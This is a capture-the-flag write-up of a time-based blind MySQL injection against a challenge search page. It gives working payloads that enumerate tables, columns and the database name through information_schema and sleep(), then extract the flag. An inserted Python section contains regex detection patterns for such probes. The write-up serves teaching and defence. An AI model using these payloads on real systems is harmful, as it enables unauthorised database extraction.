Tags: sql injection mysql time based information leak 


---- Writeup ----
CTF: BACKDOOR 2014
Problem: web-50
Author: Dr.Optix
All rights reserved.
NOTE: Another solution proof made directly from the notes I took while solving
-----------------

This problem starts at:
http://backdoor.cognizance.org.in/problems/web50/search.php

At first look it seems to be a SQL injection problem.

The source disclosed nothing useful.

I was unable to cause an error using ' or " as bad injections. Instead I
injected %%%. Because it is doing a search behind the scenes I thought I could
make it spit out everything that can be found.

I got this:

Quote    Speaker
Use the Force, Luke.    Obi-Wan Kenobi
Do… or do not. There is no try.    Master Yoda
I find your lack of faith disturbing.    Darth Vader
Fear is the path to the dark side. Fear leads to anger. Anger leads to hate. Hate leads to suffering.    Master Yoda
You’ve never heard of the Millennium Falcon? … It’s the ship that made the Kessel run in less than 12 parsecs.    Han Solo
AAARARRRGWWWH.    Chewbacca

In the source I found this after all:
    class="table table-striped">

This makes me think I have only a part of the table. Also I am dealing with a
LIKE clause SQL injection.

I should treat the query as something like this:

    SELECT column1, column2
    FROM table1
    -- MySQL has no string '+'; the wildcard wrapping is a CONCAT
    WHERE column1 LIKE CONCAT('%', @column1, '%')

I will take a break from this for now.

Back on this one. I will try to bypass the LIKE clause on localhost first.


    CREATE TABLE mytable(
       id INT NOT NULL AUTO_INCREMENT,
       info VARCHAR(100) NOT NULL,
       PRIMARY KEY ( id )
    );

I found a valid payload construction:
    search=a%' and 1=1 and '%'='

On local I found a building block like this one:
    select table_name from (select table_name from
    information_schema.tables where table_schema=database()) b where
    table_name like "m%" and sleep(5)

I'm starting to get frustrated. Maybe I should go with sqlmap. Not yet though.

I found the correct building block:
    %%%' and (select table_name from information_schema.tables where
    table_schema=database() and table_name like "m%" and sleep(2)) and
    '%'='

Complete payload schema:
    search=%%%' and (select table_name from information_schema.tables
    where table_schema=database() and table_name like "the_f%" and sleep
    (2)) and '%'='
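For anyone on the receiving end of this, here is an added example (not from the writeup) of detection logic run over constructed access-log lines carrying a normal search, the %%% dump and the time-based payload above. It assumes a combined-log format whose last field is the response time in seconds.

```python
import re
from urllib.parse import quote_plus, urlsplit, parse_qs
# The writeup's own time-based payload (one table-name guess), used only to
# build constructed sample log lines; nothing here is a real server log.
PAYLOAD = ("%%%' and (select table_name from information_schema.tables where "
           "table_schema=database() and table_name like \"m%\" and sleep(2)) and '%'=")

def _line(ip, term, secs):  # combined-log style; last field = response seconds (assumed)
    return ('%s - - [01/Apr/2014:10:00:00 +0000] "GET /problems/web50/search.php?'
            'search=%s HTTP/1.1" 200 %.3f' % (ip, quote_plus(term), secs))

SAMPLE_LOG = "\n".join([
    _line("10.0.0.5", "force", 0.031),                          # normal search
    _line("10.0.0.5", "%%%", 0.044),                            # wildcard dump
    _line("10.0.0.9", PAYLOAD, 2.012),                          # guess true: sleep fired
    _line("10.0.0.9", PAYLOAD.replace('"m%"', '"z%"'), 0.040),  # guess false: no delay
])

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ([\d.]+)$', re.M)
TIME_FUNCS = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
PROBES = [  # indicators drawn from the payload shapes in the writeup
    re.compile(r"information_schema", re.I),
    re.compile(r"\bdatabase\s*\(\s*\)", re.I),
    re.compile(r"'\s*%\s*'\s*=\s*$"),  # quote-balancing tail: ... and '%'=
    re.compile(r"^%{2,}$"),            # bare wildcard dump
]
SLOW = 2.0  # seconds; matches the sleep(2) in the payload

def classify(term, secs):
    """Verdict for one decoded term and its response time: a time-based probe
    only delays when its guess is true, so the term content must be checked too."""
    timed = bool(TIME_FUNCS.search(term))
    if timed and secs >= SLOW:
        return "time_based_sqli_confirmed"
    if timed:
        return "time_based_sqli_attempt"
    if any(p.search(term) for p in PROBES):
        return "sqli_probe"
    return None

def analyze_log(text):
    hits = []
    for m in LOG_RE.finditer(text):
        ip, _method, url, _status, secs = m.groups()
        term = parse_qs(urlsplit(url).query).get("search", [""])[0]
        verdict = classify(term, float(secs))
        if verdict:
            hits.append((ip, verdict))
    return hits
```

The fourth sample line is the important one: a wrong guess produces no delay, so a latency threshold on its own sees nothing while the decoded parameter still gives it away.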

Potential table names obtained with the above payload schema:
    qu
    the_flag_is_over_here

I found the table "the_flag_is_over_here" by hand. Now I have to extract
its columns.

To find column names I have to use information_schema.columns. To get the
columns of a particular table I have to use:

    select column_name from information_schema.columns where table_name="mytable";

Now I have to use that with the payload building block.

I have an idea how to find the column number for the "the_flag_is_over_here"
table. Using this:

    select * from (select count(*) as count from
    information_schema.columns where
    table_name="mytable") t where t.count = 1 and sleep(2);

The new payload looks like this:
    %%%' and (select * from (select count(*) as count from
    information_schema.columns where table_name="mytable") t where
    t.count = 2 and sleep(2)) and '%'='

As expected the table has one column, probably with the name of "flag".

To make sure of the name I should use information_schema.columns to get at
least the first and the second letters from the column name.

New payload for finding column name or at least a few letters.

First letter is "t".
Last letter is "e".

For easy manual search the new payload is:
    search=%%%' and (select c from (select column_name as c from
    information_schema.columns where table_name="the_flag_is_over_here"
    limit 1) t where c like concat("t", char(1),"%") and sleep(5)) and
    '%'='

Potential name: tw..e
Potential name: tw..e
Potential name: twi..e
Potential name: twisted..e
Potential name: twisted_b..e
Potential name: twisted..e
Potential name: twisted_..e
Potential name: twisted_..ame
Potential name: twisted_..name
Potential name: twisted_name
Potential name: twisted_column_name

Bingo! That's the column name.

Payload that will demonstrate this is the column name:
    search=%%%' and (select c from (select column_name as c from
    information_schema.columns where table_name="the_flag_is_over_here"
    limit 1) t where c like concat("twisted_column_name") and sleep(5))
    and '%'='

Now let's extract the info.

Damn it, I need the database name. Maybe I can concat it.

Payload building block for database name extraction:

    search=%%%' and (select c from (select table_schema as c from
    information_schema.tables where table_name="the_flag_is_over_here"
    limit 1) t where c like concat("s", char(97), "%") and sleep(5)) and
    '%'='

Database name: sqli_db

Payload building block for flag extraction:

    search=%%%' and (select twisted_column_name from
    sqli_db.the_flag_is_over_here where twisted_column_name like concat
    ("", char(51),"%") and sleep(5)) and '%'='

Partial flag: D 5 A B | A F 3 9 | 1 F 7 B | C 7 E 7 |

Extracted flag:
D 5 A B | A F 3 9 | 1 F 7 B | C 7 E 7 |
C D A 8 | C 1 2 8 | E 5 C A | 3 1 8 7

Confirmation:
    search=%%%' and (select twisted_column_name from
    sqli_db.the_flag_is_over_here where twisted_column_name =
    "D5ABAF391F7BC7E7CDA8C128E5CA3187" and sleep(5)) and '%'='

The flag is: D5ABAF391F7BC7E7CDA8C128E5CA3187

~ Q.E.D.